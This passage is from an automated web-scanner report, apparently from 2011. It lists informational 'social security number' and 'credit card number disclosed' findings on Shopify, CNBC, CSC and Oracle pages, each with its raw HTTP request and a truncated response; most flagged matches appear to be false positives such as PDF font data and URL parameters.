Cookie: _y=76726C16-B1FA-490A-93B3; __ar_v4=%7CEBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A1%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A1%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1; optimizelyEndUserId=oeu1315341237551r0.5390826954971999; optimizelyBuckets=%7B%7D; __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.5.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; _s=08DB14DB-F588-4766-8659; olarkld=1315341237560; wcsid=4XOE7W6GWNHMEHMYS9583VOC78556641; _oklv=1315341238987; hblid=JAQBX9FF2NF9W8U5RWCURZAD78556641

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "8f7c88edfb0c914b89bc76b6acab2982"
X-Rack-Cache: fresh
X-Content-Digest: b07dc9d86ea310a157a069084b0cda714abd7659
X-Runtime: 2553
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 19311
Date: Tue, 06 Sep 2011 15:34:06 GMT
X-Varnish: 1687907293 1687907271
Age: 12
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
urn "static.olark.com/jsclient/loader0.js?ts="+(a?a[1]:(+new Date))})(document.cookie.match(/olarkld=([0-9]+)/)),name:"olark",methods:["configure","extend","declare","identify"]});olark.identify('7855-664-10-3086');/*]]>
...[SNIP]...

24.5. http://www.shopify.com/login

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.shopify.com
Path:   /login

Issue detail

The following social security number was disclosed in the response:

Request

GET /login HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/examples
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _y=76726C16-B1FA-490A-93B3; optimizelyEndUserId=oeu1315341237551r0.5390826954971999; wcsid=4XOE7W6GWNHMEHMYS9583VOC78556641; hblid=JAQBX9FF2NF9W8U5RWCURZAD78556641; optimizelyBuckets=%7B%7D; __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.8.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; olarkld=1315341237560; _oklv=1315341242826; _s=08DB14DB-F588-4766-8659; __ar_v4=EBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A3%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A3%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1%7CRFYZ2NEPUVBUFENBCOH6GL%3A20110906%3A2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "5e6cd1cceddc58f0b1054bb20da87a2e"
X-Rack-Cache: fresh
X-Content-Digest: 3f0391ebb89e0d08d8add07de6cf12a5cb1d4dee
X-Runtime: 1746
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 15228
Date: Tue, 06 Sep 2011 15:40:58 GMT
X-Varnish: 1482397443 1482397441
Age: 108
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
urn "static.olark.com/jsclient/loader0.js?ts="+(a?a[1]:(+new Date))})(document.cookie.match(/olarkld=([0-9]+)/)),name:"olark",methods:["configure","extend","declare","identify"]});olark.identify('7855-664-10-3086');/*]]>
...[SNIP]...

24.6. http://www.shopify.com/tour

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.shopify.com
Path:   /tour

Issue detail

The following social security number was disclosed in the response:

Request

GET /tour HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.2.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; _y=76726C16-B1FA-490A-93B3; _s=08DB14DB-F588-4766-8659; __ar_v4=%7CEBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A1%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A1%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "16ce554bcc0e560a6719831237efac75"
X-Rack-Cache: fresh
X-Content-Digest: f28972877127f1924c2d86adc520840168285bb1
X-Runtime: 4033
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 24792
Date: Tue, 06 Sep 2011 15:33:55 GMT
X-Varnish: 1482396697 1482396684
Age: 150
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
urn "static.olark.com/jsclient/loader0.js?ts="+(a?a[1]:(+new Date))})(document.cookie.match(/olarkld=([0-9]+)/)),name:"olark",methods:["configure","extend","declare","identify"]});olark.identify('7855-664-10-3086');/*]]>
...[SNIP]...

25. Credit card numbers disclosed
There are 135 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


25.1. http://api.cnbc.com/api/movers/movers.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.cnbc.com
Path:   /api/movers/movers.asp

Issue detail

The following credit card number was disclosed in the response:

Request

GET /api/movers/movers.asp?chartType=gainers&rowCount=3&link=quote HTTP/1.1
Host: api.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_most_recent_quotes=.DJIA; cnbc_regional_cookie=US; cnbcStreamQuoteMasterToggleRememberSwitch=on; s_cc=true; s_nr=1315341081909; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:34:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:54:02 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 1910


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Market Movers</title>
   <link rel='stylesheet' ty
...[SNIP]...
mbol":"US;SPX","gainers":[{"ticker":"SUN","company":"Sunoco Inc","change":"3.3","raw":3.2677956244807453,"direction":"gainers"},{"ticker":"IP","company":"International Paper Co","change":"2.6","raw":2.5500196155355126,"direction":"gainers"},{"ticker":"DV","company":"DeVry Inc","change":"1.4","raw":1.448208149239068,"direction":"gainers"}],"losers":[{"ticker":"ATI","company":"Allegheny Technologies Inc","change":"6.
...[SNIP]...

25.2. http://assets1.csc.com/es/downloads/7380_2.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets1.csc.com
Path:   /es/downloads/7380_2.pdf

Issue detail

The following credit card number was disclosed in the response:

Request

GET /es/downloads/7380_2.pdf HTTP/1.1
Host: assets1.csc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
x-amz-id-2: 1vptvkdbk27rpKm8gktp99PjKr2H3nFbiLFY+PGrKUxDkGYoKaaXHRZvwxnB+eu+
x-amz-request-id: 5E4300587F716F53
Date: Tue, 06 Sep 2011 17:06:02 GMT
Last-Modified: Thu, 13 Nov 2008 12:16:15 GMT
ETag: "f216d5d5987acb4495ffec28a81cfbf6"
Accept-Ranges: bytes
Content-Type: application/pdf
Content-Length: 3210194
Server: AmazonS3
Age: 1
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: b910ab2588d6c1aa584cbfe23779883d9f19ff58eb141762f7f07a92f22f036c35a02ee70c0c43b4
Via: 1.0 95b17deadcb6eb61302c26e3cdac6107.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront)
Connection: close

%PDF-1.6%....
645 0 obj<</PageMode/UseOutlines/ViewerPreferences<</Direction/L2R>>/Outlines 696 0 R/Metadata 642 0 R/AcroForm 646 0 R/Pages 632 0 R/PageLayout/SinglePage/OpenAction 1243 0 R/Type/Ca
...[SNIP]...
</Subtype/Type1/FontDescriptor 522 0 R/LastChar 224/Widths[547 547 230 269 0 480 480 0 702 0 370 370 0 617 240 365 240 320 480 480 480 480 480 480 480 480 480 480 240 240 0 617 0 342 0 645 586 659 729 554 515 702 767 336 330 657 531 893 741 745 558 745 622 476 606 729 668 944 0 595 599 370 0 370 0 0 0 436 515 417 528 420 295 456 533 266 255 490 252 824 546 517 528 512 367 35
...[SNIP]...
</Subtype/Type1/FontDescriptor 522 0 R/LastChar 224/Widths[547 547 230 269 0 480 480 0 702 0 370 370 0 617 240 365 240 320 480 480 480 480 480 480 480 480 480 480 240 240 0 617 0 342 0 645 586 659 729 554 515 702 767 336 330 657 531 893 741 745 558 745 622 476 606 729 668 944 0 595 599 370 0 370 0 0 0 436 515 417 528 420 295 456 533 266 255 490 252 824 546 517 528 512 367 35
...[SNIP]...
</Subtype/Type1/FontDescriptor 522 0 R/LastChar 224/Widths[547 547 230 269 0 480 480 0 702 0 370 370 0 617 240 365 240 320 480 480 480 480 480 480 480 480 480 480 240 240 0 617 0 342 0 645 586 659 729 554 515 702 767 336 330 657 531 893 741 745 558 745 622 476 606 729 668 944 0 595 599 370 0 370 0 0 0 436 515 417 528 420 295 456 533 266 255 490 252 824 546 517 528 512 367 35
...[SNIP]...
</Subtype/Type1/FontDescriptor 522 0 R/LastChar 224/Widths[547 547 230 269 0 480 480 0 702 0 370 370 0 617 240 365 240 320 480 480 480 480 480 480 480 480 480 480 240 240 0 617 0 342 0 645 586 659 729 554 515 702 767 336 330 657 531 893 741 745 558 745 622 476 606 729 668 944 0 595 599 370 0 370 0 0 0 436 515 417 528 420 295 456 533 266 255 490 252 824 546 517 528 512 367 35
...[SNIP]...

25.3. http://assets1.csc.com/lef/downloads/LEFBriefing_TestingApplicationsCloud_021011.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets1.csc.com
Path:   /lef/downloads/LEFBriefing_TestingApplicationsCloud_021011.pdf

Issue detail

The following credit card numbers were disclosed in the response:

Request

GET /lef/downloads/LEFBriefing_TestingApplicationsCloud_021011.pdf HTTP/1.1
Host: assets1.csc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
x-amz-id-2: J17Unk9b4idn9zwu1HmUcQ2AY+eVLRBTH3oMcV9+J6TxzyMIDeojEOJQU+vrrj86
x-amz-request-id: CD4228B00893E8EB
Date: Tue, 06 Sep 2011 17:06:06 GMT
Last-Modified: Thu, 17 Feb 2011 18:48:05 GMT
ETag: "f6b07e2e2f31147f835cf2cf7da8e009"
Accept-Ranges: bytes
Content-Type: application/pdf
Content-Length: 3339531
Server: AmazonS3
Age: 2
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: c14f5715e79dc56c358938c6754402fb768e7a7596d0092d89f5251b2db16783d2b305ee24544ef2
Via: 1.0 a4a33eb6d328de8565b9c9b34e7c790d.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront)
Connection: close

%PDF-1.5
%....
1 0 obj
<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 1172 0 R/MarkInfo<</Marked true>>>>
endobj
2 0 obj
<</Type/Pages/Count 45/Kids[ 3 0 R 16 0 R 22 0 R 31 0 R 51 0 R 8
...[SNIP]...
</Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750] /FontFile2 4073 0 R>
...[SNIP]...
bj
[ 4[ 1030] 57[ 786] 131[ 458] 190[ 794] ]
endobj
4072 0 obj
[ 226 0 0 0 0 0 705 0 0 0 0 0 0 0 0 430 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 606 561 529 630 488 459 637 0 267 0 547 423 874 659 676 532 686 563 473 495 0 591 0 551 520 0 0 0 0 0 0 0 494 0 418 537 503 316 474 537 246 0 480 246 813 537 538 537 537 355 399 347 537 473 745 459 474 397]
endobj
4073 0 obj
<</Filter/FlateDecode/Length 64003/Length1 120812
...[SNIP]...
0 0 0 0 0 0 0 0 0 278 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 667 667 722 0 0 0 0 722 278 0 667 0 833 0 778 667 0 722 667 611 0 667 944 0 0 0 0 0 0 0 0 0 556 0 500 556 556 278 556 0 222 0 500 222 833 556 556 556 0 333 500 278 556 0 722 500 500]
endobj
4077 0 obj
[ 228 0 0 0 0 0 547 0 0 0 0 0 0 273 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 547 0 592 592 547 0 0 0 228 0 0 0 0 0 638 547 638 592 547 501 592 547 774 0 0 0 0
...[SNIP]...

25.4. http://assets1.csc.com/lef/downloads/LEF_Briefing_TestingCoE_052809.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets1.csc.com
Path:   /lef/downloads/LEF_Briefing_TestingCoE_052809.pdf

Issue detail

The following credit card number was disclosed in the response:

Request

GET /lef/downloads/LEF_Briefing_TestingCoE_052809.pdf HTTP/1.1
Host: assets1.csc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
x-amz-id-2: zYYJljlF5SFE+GrD4CJRlBUcaGTK1OuLAnYS8gsTn5kHdogibKjGZ/Zkyh5XQiZb
x-amz-request-id: 7262CFD5F70F1995
Date: Tue, 06 Sep 2011 17:06:04 GMT
Last-Modified: Mon, 08 Jun 2009 18:04:03 GMT
ETag: "600baff3759b06e56fd71b9bed3cb369"
Accept-Ranges: bytes
Content-Type: application/pdf
Content-Length: 1587670
Server: AmazonS3
Age: 1
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: f6b26ddea16ad0da23493e32edb9bf8a272ca7921b731bc65066ee96909744e4136b8374a30ab146
Via: 1.0 c36847c5252e758d61b94a1d396be659.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront)
Connection: close

%PDF-1.5
%....
1 0 obj
<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 381 0 R/MarkInfo<</Marked true>>>>
endobj
2 0 obj
<</Type/Pages/Count 18/Kids[ 3 0 R 15 0 R 25 0 R 33 0 R 41 0 R 79
...[SNIP]...
</Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750] /FontFile2 2528 0 R>
...[SNIP]...

25.5. http://education.oracle.com/education/jscripts/otn_nav1.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /education/jscripts/otn_nav1.js

Issue detail

The following credit card number was disclosed in the response:

Request

GET /education/jscripts/otn_nav1.js HTTP/1.1
Host: education.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/education/selectcountry-new-079003.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342486444; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; BIGipServerfapap-education_http_pool=2534249101.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
ETag: "1727b10-d341-4dda4475"
Content-Type: application/x-javascript
Last-Modified: Mon, 23 May 2011 11:26:45 GMT
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (G;max-age=300+0;age=297;ecid=72057854303488537,0)
Content-Length: 54081
Date: Sat, 03 Sep 2011 05:18:14 GMT
Accept-Ranges: bytes

...function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
var d=document; if(d.imag
...[SNIP]...
ex.html";
var otn_level8_sccode ="otnarticles";
var otn_level8_items = [ ];


var otn_level9_label =rd_temp_config.mosaic_otn_5;
var otn_level9_link ="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468";
var otn_level9_sccode ="otntutorials";
var otn_level9_items = [ ];


var otn_level10_label =rd_temp_config.mosaic_otn_6;
var otn_level10_link ="http://www.oracle.com/newsletters/index.html#te
...[SNIP]...

25.6. https://education.oracle.com/education/jscripts/otn_nav1.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://education.oracle.com
Path:   /education/jscripts/otn_nav1.js

Issue detail

The following credit card number was disclosed in the response:

Request

GET /education/jscripts/otn_nav1.js HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=&p_org_id=&p_lang=56fe7
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000

Response

HTTP/1.1 200 OK
ETag: "1727b10-d341-4dda4475"
Content-Type: application/x-javascript
Last-Modified: Mon, 23 May 2011 11:26:45 GMT
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=300+0;age=298;ecid=144115392507189562,0)
Content-Length: 54081
Date: Sat, 27 Aug 2011 05:43:57 GMT
Accept-Ranges: bytes

...function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
var d=document; if(d.imag
...[SNIP]...
ex.html";
var otn_level8_sccode ="otnarticles";
var otn_level8_items = [ ];


var otn_level9_label =rd_temp_config.mosaic_otn_5;
var otn_level9_link ="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468";
var otn_level9_sccode ="otntutorials";
var otn_level9_items = [ ];


var otn_level10_label =rd_temp_config.mosaic_otn_6;
var otn_level10_link ="http://www.oracle.com/newsletters/index.html#te
...[SNIP]...

25.7. http://www.oracle.com/ao/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /ao/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /ao/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=41185998748378867,0:1)
Date: Tue, 06 Sep 2011 16:16:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','ao','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.8. http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/bangladesh-316183-en-as.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /as/corporate/contact/bangladesh-316183-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41186041698052273,0:1)
Date: Tue, 06 Sep 2011 16:16:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','as','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.9. http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/bhutan-316187-en-as.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /as/corporate/contact/bhutan-316187-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35763838760381153,0:1)
Date: Tue, 06 Sep 2011 16:16:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','as','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.10. http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/brunei-316198-en-as.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /as/corporate/contact/brunei-316198-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=36013329115639045,0:1)
Date: Tue, 06 Sep 2011 16:16:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','as','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.11. http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/cambodia-316193-en-as.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /as/corporate/contact/cambodia-316193-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41170936298073964,0:1)
Date: Tue, 06 Sep 2011 16:17:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','as','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.12. http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/laos-316260-en-as.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /as/corporate/contact/laos-316260-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41186217791713760,0:1)
Date: Tue, 06 Sep 2011 16:17:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
